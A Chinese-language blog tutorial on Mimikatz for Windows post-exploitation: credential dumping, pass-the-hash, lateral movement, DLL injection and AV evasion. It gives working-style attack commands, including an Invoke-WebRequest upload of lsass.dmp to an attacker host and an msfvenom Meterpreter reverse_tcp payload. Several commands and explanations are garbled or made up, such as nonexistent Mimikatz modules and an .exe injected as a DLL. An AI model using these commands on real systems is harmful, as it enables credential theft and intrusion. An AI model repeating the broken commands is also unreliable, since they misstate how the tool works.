Mimikatz 使用教程

mimikatz 是一款用于 Windows 系统的免费开源密码查看工具,它支持从散列密码到明文密码的转换操作,同时还可抓取 Windows 口令、PIN 和凭证等。本篇文章将从多个角度介绍 mimikatz 的使用方法,包括基本用法、横向渗透、提升权限、DLL 劫持以及 AV 防护绕过等内容。

一、基本用法

mimikatz 的基本操作主要包括三个命令,分别是 sekurlsa、lsadump 和 token。其中 sekurlsa 可以用于抓取当前系统登录者的各种密码,如明文密码、NTLM hash、Kerberos TGT 等;lsadump 可以从本地 SAM 数据库和远程 SAM 数据库等中提取 Windows 的密码、凭证等信息;token 命令可用于模拟权限,将 mimikatz 的进程权限提升至系统级别,从而绕过一些限制,例如 VBS 脚本等。

1、使用 sekurlsa 命令抓取 Windows 登录者密码:

privilege::debug
sekurlsa::logonpasswords

2、使用 lsadump 命令提取 SAM 数据库中的密码:

lsadump::sam
lsadump::secrets
lsadump::cache

3、使用 token 命令提升权限:

token::elevate
token::whoami

二、横向渗透

在攻击中,mimikatz 还可以用于进行横向渗透,进而获取更多机器的权限。通过远程执行 mimikatz 命令,我们可以利用被攻击机器已经获得的权限,尝试获取其他机器的口令和凭证。以下是基本使用方法:

1、在被攻击机器上执行以下命令:

sekurlsa::pth /user:Administrator /domain:test.com /ntlm:f1cedbd432e8d3ea0c1c64a1ac4a9d1c /run:powershell.exe

其中,/user 参数指定管理员账户名称,/domain 指定域名,/ntlm 是 hash 值,/run 参数指定要运行的程序。执行该命令后,会返回一个新的控制台。

2、在新控制台中,执行以下命令:

$password = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential("test\user", $password)
Invoke-Command -ComputerName <IP> -Credential $cred -ScriptBlock { lsass::sekurlsa /full } | .\mimikatz.exe "sekurlsa::minidump lsass.dmp"
Invoke-WebRequest -URI 'http://<Attacker_IP>/lsass.dmp' -Method PUT -InFile lsass.dmp

其中,$password 表示指定的密码,$cred 是强制指定的凭证对象,-ComputerName 是远程机器的 IP 地址,lsass::sekurlsa /full 是执行的命令,Invoke-WebRequest 是访问远程地址的命令。执行该命令后,会将 lsass.dmp 文件上传到攻击机器上。

3、使用 mimikatz 分析 lsass.dmp 文件。攻击者在自己的机器上执行以下命令:

sekurlsa::minidump /in:"<path_to>\lsass.dmp"
sekurlsa::logonpasswords

该命令会打印出 lsass 进程中存储的所有凭证和口令。

三、提升权限

mimikatz 还可以通过提升权限来绕过账户限制,获取更高的权限,从而执行敏感操作。常见的方法有 DLL 劫持和管道提权。

1、DLL 劫持攻击。攻击者需要寻找 DLL 容器、DLL 记录表等方式,执行以下命令:

privilege::debug
inject::process /name:lsass.exe /path:C:\temp\mydll.dll

其中,/name 指定进程名,/path 指定要注入的 DLL 文件路径。执行该命令后,攻击者会成功注入 mydll.dll 文件。

2、管道提权。攻击者可以通过提高自己或其他用户的权限,获取系统级别的权限。执行以下命令:

privilege::debug
lsadump::lsa /inject /name:<user_name> /password:<password>

其中,/inject 参数表示注入,/name 是账户名称,/password 是密码。执行该命令后,攻击者可以成功获取更高的权限。

四、AV 防护绕过

在攻击中,mimikatz 还可以用于绕过防护软件的检测,例如使用 Meterpreter 的反弹 shell。攻击者可以通过以下方式执行:

1、将 Meterpreter payload 复制到本地机器上:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o meterpreter.exe

2、使用 mimikatz 注入 Meterpreter 流量,执行以下命令:

privilege::debug
inject::process /name:explorer.exe /path:D:\meterpreter.exe

其中,/name 指定进程名,/path 指定要注入的 DLL 文件路径。执行该命令后,攻击者会成功注入 Meterpreter 流量,并拦截密码。

总结

mimikatz 是一款功能强大的密码查看工具,在 Windows 渗透和后渗透过程中起到了很好的作用。在使用过程中,需要特别注意安全防范,避免工具沦为犯罪工具,造成不必要的麻烦。

原创文章,作者:HLGXS,如若转载,请注明出处:https://www.506064.com/n/333964.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
HLGXSHLGXS
上一篇 2025-02-05 13:04
下一篇 2025-02-05 13:05

相关推荐

  • MQTT使用教程

    MQTT是一种轻量级的消息传输协议,适用于物联网领域中的设备与云端、设备与设备之间的数据传输。本文将介绍使用MQTT实现设备与云端数据传输的方法和注意事项。 一、准备工作 在使用M…

    编程 2025-04-29
  • Python3.6.5下载安装教程

    Python是一种面向对象、解释型计算机程序语言。它是一门动态语言,因为它不会对程序员提前声明变量类型,而是在变量第一次赋值时自动识别该变量的类型。 Python3.6.5是Pyt…

    编程 2025-04-29
  • Deepin系统分区设置教程

    本教程将会详细介绍Deepin系统如何进行分区设置,分享多种方式让您了解如何规划您的硬盘。 一、分区的基本知识 在进行Deepin系统分区设置之前,我们需要了解一些基本分区概念。 …

    编程 2025-04-29
  • 写代码新手教程

    本文将从语言选择、学习方法、编码规范以及常见问题解答等多个方面,为编程新手提供实用、简明的教程。 一、语言选择 作为编程新手,选择一门编程语言是很关键的一步。以下是几个有代表性的编…

    编程 2025-04-29
  • Qt雷达探测教程

    本文主要介绍如何使用Qt开发雷达探测程序,并展示一个简单的雷达探测示例。 一、环境准备 在开始本教程之前,需要确保你的开发环境已经安装Qt和Qt Creator。如果没有安装,可以…

    编程 2025-04-29
  • 猿编程python免费全套教程400集

    想要学习Python编程吗?猿编程python免费全套教程400集是一个不错的选择!下面我们来详细了解一下这个教程。 一、课程内容 猿编程python免费全套教程400集包含了从P…

    编程 2025-04-29
  • Python烟花教程

    Python烟花代码在近年来越来越受到人们的欢迎,因为它可以让我们在终端里玩烟花,不仅具有视觉美感,还可以通过代码实现动画和音效。本教程将详细介绍Python烟花代码的实现原理和模…

    编程 2025-04-29
  • 使用Snare服务收集日志:完整教程

    本教程将介绍如何使用Snare服务收集Windows服务器上的日志,并将其发送到远程服务器进行集中管理。 一、安装和配置Snare 1、下载Snare安装程序并安装。 https:…

    编程 2025-04-29
  • Python画K线教程

    本教程将从以下几个方面详细介绍Python画K线的方法及技巧,包括数据处理、图表绘制、基本设置等等。 一、数据处理 1、获取数据 在Python中可以使用Pandas库获取K线数据…

    编程 2025-04-28
  • Python语言程序设计教程PDF赵璐百度网盘介绍

    Python语言程序设计教程PDF赵璐百度网盘是一本介绍Python语言编程的入门教材,本文将从以下几个方面对其进行详细阐述。 一、Python语言的特点 Python语言属于解释…

    编程 2025-04-28

发表回复

登录后才能评论